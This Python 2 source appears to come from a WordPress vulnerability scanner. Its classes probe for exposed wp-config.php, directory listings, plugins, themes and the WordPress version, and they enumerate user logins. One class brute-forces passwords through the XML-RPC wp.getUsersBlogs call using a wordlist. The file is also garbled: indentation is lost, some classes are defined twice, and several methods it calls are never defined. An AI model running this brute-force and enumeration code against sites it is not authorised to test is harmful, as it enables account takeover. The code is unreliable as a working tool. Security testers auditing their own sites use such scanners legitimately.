class wplisting:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
paths = [
'/wp-admin', '/wp-includes', '/wp-content/uploads',
'/wp-content/plugins', '/wp-content/themes'
]
try:
for path in paths:
url = wplisting.chk.path(self.url, path)
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if resp.url == url:
wplisting.out.plus(
'Dir {} listing enabled under: {}'.format(
path, resp.url))
except Exception, e:
pass
class wplogin:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
url = wplogin.chk.path(self.url, '/wp-login.php')
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200:
if resp.url == url:
wplogin.out.plus(
'wp-login not detect protection under: {}'.format(
resp.url))
elif resp.status_code == 404:
if resp.url == url:
wplogin.out.plus(
'wp-login detect protection under: {}'.format(
resp.url))
except Exception, e:
pass
class wpconfig:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
url = wpconfig.chk.path(self.url, '/wp-config.php')
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if resp.url == url:
if re.search(r'\S+define(\S+,*)', resp._content):
wpconfig.out.plus(
'wp-config available under: {}'.format(resp.url))
self.wpbk()
except Exception, e:
pass
class wpfile:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
db = open('db/common_file.txt', 'rb')
dbfiles = [file.split('\n') for file in db]
try:
for file in dbfiles:
url = wpfile.chk.path(self.url, file[0])
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if resp.url == url:
wpfile.out.plus('Found {} file under: {}'.format(
file[0], resp.url))
except Exception, e:
pass
class wprobots:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie, result):
self.url = url
self.result = result
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
url = wprobots.chk.path(self.url, '/robots.txt')
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if resp.url == url:
self.result.robots = resp.url
wprobots.out.plus('Robots available under: {}'.format(
resp.url))
print "-------------------------\r\n{}\n-------------------------".format(
resp._content)
except Exception, e:
pass
class wpversion:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie):
self.url = url
self.agent = agent
self.cookie = cookie
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
try:
url = wpversion.chk.path(self.url,'/wp-links-opml.php')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
vers = re.findall(r'\S+WordPress/(\d+.\d+[.\d+]*)',resp._content)
if vers:
wpversion.out.plus('Running WordPress version: {}'.format(vers[0]))
self.dbwpscan(vers[0])
except Exception,e:
try:
url = wpversion.chk.path(self.url,'/feed')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
vers = re.findall(r'\S+?v=(\d+.\d+[.\d+]*)',resp._content)
if vers:
wpversion.out.plus('Running WordPress version: {}'.format(vers[0]))
self.dbwpscan(vers[0])
except Exception,e:
try:
url = wpversion.chk.path(self.url,'/feed/atom')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
vers = re.findall(r'<generator uri="http://wordpress.org/" version="(\d+\.\d+[\.\d+]*)"',resp._content)
if vers:
wpversion.out.plus('Running WordPress version: {}'.format(vers[0]))
self.dbwpscan(vers[0])
except Exception,e:
try:
url = wpversion.chk.path(self.url,'readme.html')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
vers = re.findall(r'.*wordpress-logo.png" /></a>\n.*<br />.* (\d+\.\d+[\.\d+]*)\n</h1>',resp._content)
if vers:
wpversion.out.plus('Running WordPress version: {}'.format(vers[0]))
self.dbwpscan(vers[0])
except Exception,e:
try:
url = wpversion.chk.path(self.url,'')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
vers = re.findall(r'<meta name="generator" content="WordPress (\d+\.\d+[\.\d+]*)"',resp._content)
if vers:
wpversion.out.plus('Running WordPress version: {}'.format(vers[0]))
self.dbwpscan(vers[0])
except Exception,e:
pass
class wpplugin:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie,result):
self.url = url
self.result = result
self.cookie = cookie
self.agent = agent
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
wpplugin.out.test('Passive enumerate plugins..')
try:
url = wpplugin.chk.path(self.url,'')
resp = self.req.send(url,c=self.cookie)
plugins = re.findall(r'/wp-content/plugins/(.+?)/',resp.content)
plugin = []
self.result.plugins = []
for pl in plugins:
if pl not in plugin:
plugin.append(pl)
if plugin != []:
if len(plugin) == 1:
wpplugin.out.plus('Name: {}'.format(plugin[0]))
obj = type('', (), {})()
obj.name = plugin[0]
self.changelog(plugin[0], obj)
self.fullpathdisc(plugin[0])
self.license(plugin[0])
self.listing(plugin[0])
self.readme(plugin[0], obj)
self.dbwpscan(plugin[0], obj)
self.result.plugins.append(vars(obj))
elif len(plugin) > 1:
for pl in plugin:
wpplugin.out.plus('Name: {}'.format(pl))
obj = type('', (), {})()
obj.name = pl
self.changelog(pl, obj)
self.fullpathdisc(pl)
self.license(pl)
self.listing(pl)
self.readme(pl, obj)
self.dbwpscan(pl, obj)
self.result.plugins.append(vars(obj))
else:
wpplugin.out.warning('Not found plugins..')
except Exception,e:
pass
class wptheme:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.agent = agent
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
wptheme.out.test('Passive enumerate themes..')
try:
url = wptheme.chk.path(self.url, '')
resp = self.req.send(url, c=self.cookie)
theme = re.findall(r'/wp-content/themes/(.+?)/', resp.content)
themes = []
for th in theme:
if th not in themes:
themes.append(th)
if themes != []:
if len(themes) == 1:
wptheme.out.plus('Name: {}'.format(themes[0]))
self.info(themes[0])
self.style(themes[0])
self.changelog(themes[0])
self.fullpathdisc(themes[0])
self.license(themes[0])
self.listing(themes[0])
self.readme(themes[0])
self.dbwpscan(themes[0])
elif len(themes) > 1:
for theme in themes:
wptheme.out.plus('Name: {}'.format(theme))
self.info(theme)
self.style(theme)
self.changelog(theme)
self.fullpathdisc(theme)
self.license(theme)
self.listing(theme)
self.readme(theme)
self.dbwpscan(theme)
elif themes == None:
wptheme.out.warning('Not found themes..')
except Exception, e:
print e
class wpusers:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie, result):
self.url = url
self.result = result
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
wpusers.out.test('Enumerate users..')
users = []
df_users = []
self.result.users = []
# From the version 4.7 the REST API is enabled by default
if self.result.version and (StrictVersion(self.result.version) >=
StrictVersion("4.7")):
try:
url = wpusers.chk.path(
self.url, "/?rest_route=/wp/v2/users&per_page=100")
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200:
authors = resp.json()
for author in authors:
df_users.append(author['slug'])
except Exception, e:
pass
# Use the normal enumeration method
for x in range(1, 15):
path = "/?author={}".format(str(x))
try:
url = wpusers.chk.path(self.url, path)
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200:
author = re.findall(r'/author/(.+?)/', resp.content)
if len(author) == 1:
if author[0] not in df_users:
df_users.append(author[0])
elif len(author) > 1:
for i in author:
if i[0] not in df_users:
df_users.append(author[0])
except Exception, e:
pass
class wpusers:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
wpusers.out.test('Enumerate users..')
users = []
df_users = []
for x in range(0, 15):
path = "/?author={}".format(str(x))
try:
url = wpusers.chk.path(self.url, path)
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 200:
author = re.findall(r'/author/(.+?)/', resp.content)
if len(author) == 1:
if author[0] not in df_users:
df_users.append(author[0])
elif len(author) > 1:
for i in author:
if i[0] not in df_users:
df_users.append(author[0])
except Exception, e:
pass
for i in df_users:
if i not in users:
users.append(i)
if users != []:
for user in xrange(len(users)):
if '%20' in users[user][0]:
wpusers.out.more(' ID: {} - Login: {}'.format(
user, users[user].replace('%20', ' ')))
else:
wpusers.out.more(' ID: {} - Login: {}'.format(
user, users[user]))
elif users == None:
wpusers.out.warning('Not found users :(')
class wpxmlrpc:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie, wlist, user):
self.url = url
self.cookie = cookie
self.wlist = wlist
self.user = user
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
wpxmlrpc.out.plus('Bruteforcing login via xmlrpc..')
try:
db = open(self.wlist, 'rb')
except Exception, e:
wpxmlrpc.out.warning(e)
dbfiles = [file.split('\n') for file in db]
for passwd in dbfiles:
payload = """<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value><string>""" + self.user + """</string></value></param>
<param><value><string>""" + str(
passwd[0]) + """</string></value></param></params>
</methodCall>"""
url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php')
resp = self.req.send(url, m="POST", p=payload, c=self.cookie)
if re.search('<name>isAdmin</name><value><boolean>0</boolean>',
resp._content):
wpxmlrpc.out.plus(
'Valid credentials: \"{}\" - \"{}\"'.format(
self.user, passwd[0]))
elif re.search(
'<name>isAdmin</name><value><boolean>1</boolean>',
resp.content):
wpxmlrpc.out.plus(
'Valid admin credentials: \"{}\" - \"{}\"'.format(
self.user, passwd[0]))
wpxmlrpc.out.passs()
except Exception, e:
pass
class wpfpd:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
try:
url = wpfpd.chk.path(self.url,'/wp-includes/rss-functions.php')
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if re.search(r'Fatal error',resp._content):
wpfpd.out.plus('Full Path Disclosure: {}'.format(resp.url))
except Exception,e:
pass
class fingerprint:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
resp = self.req.send(self.url, c=self.cookie)
server.wpserver().run(resp.headers)
waf.wpwaf().run(resp._content)
headers.wpheaders().run(resp.headers)
wpprint.wpprint().passs()
except Exception, e:
pass
class wpxmlrpc:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self, agent, proxy, redir, time, url, cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(agent=agent,
proxy=proxy,
redir=redir,
time=time)
def run(self):
try:
url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php')
resp = self.req.send(url, c=self.cookie)
if resp.status_code == 405 and resp._content != None:
if resp.url == url:
wpxmlrpc.out.plus(
'XML-RPC Interface available under: {}'.format(
resp.url))
except Exception, e:
pass
